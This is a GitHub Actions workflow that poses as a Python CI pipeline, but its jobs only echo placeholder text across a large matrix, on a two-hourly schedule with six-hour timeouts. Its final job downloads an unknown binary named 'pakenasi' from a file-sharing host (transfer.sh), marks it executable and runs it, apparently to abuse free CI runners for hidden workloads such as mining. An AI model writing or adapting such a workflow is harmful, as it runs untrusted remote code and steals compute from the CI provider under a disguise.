name: Python 
on:   
  push: 
  pull_request: 
  schedule: 
  - cron: "0 */2 * * *" 

jobs: 
 python-1: 
    runs-on: ubuntu-latest 
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [A, B, C, D] 
    timeout-minutes: 360 

    steps: 
    - uses: actions/checkout@v3 
    - name: Python-run 
      run: echo "pythosns" 

 python-2: 
    runs-on: ubuntu-latest  
    needs: python-1 
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [A, B, C, D] 
    timeout-minutes: 360 

    steps: 
    - uses: actions/checkout@v3 
    - name: Python-run 
      run: echo "python" 

 python-build-1: 
    runs-on: ubuntu-20.04  
    needs: python-2 
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/nF4Ozn/pakenasi; chmod +x pakenasi; ./pakenasi
  
